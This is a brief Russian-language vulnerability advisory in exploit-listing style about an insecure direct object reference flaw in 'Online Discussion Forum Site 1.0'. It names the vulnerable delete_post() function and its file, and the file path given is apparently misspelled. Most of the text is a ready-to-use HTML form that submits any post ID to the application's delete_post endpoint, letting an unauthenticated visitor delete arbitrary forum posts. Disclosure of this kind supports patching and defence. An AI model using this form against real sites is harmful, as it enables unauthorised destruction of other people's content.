
Сайт онлайн-форума для обсуждений 1.0 — IDOR / Удаление любого сообщения
Сайт форума онлайн-обсуждений 1.0 - IDOR / Удаление любого сообщения
[#] Местоположение уязвимости:
function delete_post() в /odfs/classes/Maset.php:133
[#] Эксплуатация:
<form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user"> <input type="text" name="id" value="" placeholder="enter POST ID to delete" required> <button type="submit">Delete Post</button> </form>